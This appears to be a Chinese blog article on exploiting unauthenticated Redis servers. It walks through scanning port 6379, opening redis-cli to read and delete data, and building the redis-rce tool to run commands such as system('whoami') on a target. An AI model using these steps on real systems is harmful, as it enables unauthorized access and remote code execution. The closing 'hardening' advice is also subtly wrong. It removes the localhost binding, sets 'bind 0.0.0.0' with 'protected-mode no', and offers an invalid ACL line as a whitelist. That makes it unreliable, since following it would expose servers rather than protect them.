Redis未授权访问漏洞利用技巧（redis未授权利用方法）

Redis未授权访问漏洞利用技巧

Redis是一款基于内存的高性能键值数据库，已成为当今Web应用程序中最流行的NoSQL数据库之一。然而，Redis默认情况下并不强制用户进行身份验证。这意味着任何人都可以使用默认值连接到Redis服务器，并查询、修改和删除数据库中的数据。这种情况可以被称为“未授权访问漏洞”，因此有必要了解一些Redis未授权访问漏洞利用技巧，以确保您的Redis服务器安全。

1.使用nmap扫描Redis服务器端口

nmap是一种流行的开源端口扫描工具，可以用于快速扫描Redis服务器的端口，并确认Redis实例是否已经暴露于公开网络之中。以下命令将扫描Redis服务器默认端口6379：

nmap -p 6379 

如果Redis服务器暴露在公开网络中，则可以使用其他工具扫描Redis服务器，以获取它的详细信息。

2.使用redis-cli连接到Redis服务器

redis-cli是Redis自带的命令行工具，可用于与运行中的Redis实例进行交互。以下命令将使用redis-cli连接到Redis服务器：

redis-cli -h  -p 

如果Redis服务器没有启用身份验证，您可以立即进行数据访问。以下是一些有用的命令：

set key value  #设置键为key，值为value
get key  #获取键为key的值
keys *  #获取所有键
del key  #删除键为key的键值对

3.利用redis-rce工具执行远程代码执行攻击

redis-rce是一种可利用Redis未授权访问漏洞的工具，可利用Redis未授权访问漏洞，并在目标计算机上执行任意代码。以下是使用redis-rce的步骤：

1.下载、构建和部署redis-rce

git clone https://github.com/n0b0dyCN/redis-rce.git
cd redis-rce
make

2.执行攻击

./redis-RCE -h  -p  -c "system('whoami')"

这条命令将执行whoami命令，并显示当前用户身份。

4.加强安全性

为了防止Redis未授权访问漏洞，您可以采取以下预防措施：

– 禁用默认端口

– 对Redis服务器进行身份验证

– 限制Redis服务器的IP白名单

例如，以下步骤可以极大地提高Redis服务器的安全性：

1.从配置文件中删除bind 127.0.0.1

bind选项指定Redis服务器监听的IP地址，删除这一行将禁止Redis绑定到本地主机(IP 127.0.0.1)。

2.启用身份验证

打开配置文件，找到以下行：

# requirepass foobared

取消注释，并将foobared替换为一个强密码。这将启用Redis服务器的身份验证功能。

3.配置IP白名单

打开配置文件，找到以下行：

# bind 127.0.0.1

将其替换为：

bind 0.0.0.0
requirepass 
protected-mode no
#设置仅允许访问的IP段
# acl allow_subnet src 192.168.0.0/16
# bind 0.0.0.0

在这里，我们禁用保护模式，启用身份验证，并配置了一条IP白名单规则。acl allow_subnet命令将仅允许来自192.168.0.0/16子网的IP地址连接到Redis服务器。

总结

在本篇文章中，我们了解了Redis未授权访问漏洞的利弊，并描述了一些针对该漏洞的攻击技巧。我们还讨论了一些加强Redis服务器安全性的方法，以帮助您避免安全隐患，并享受Redis的高性能和灵活性。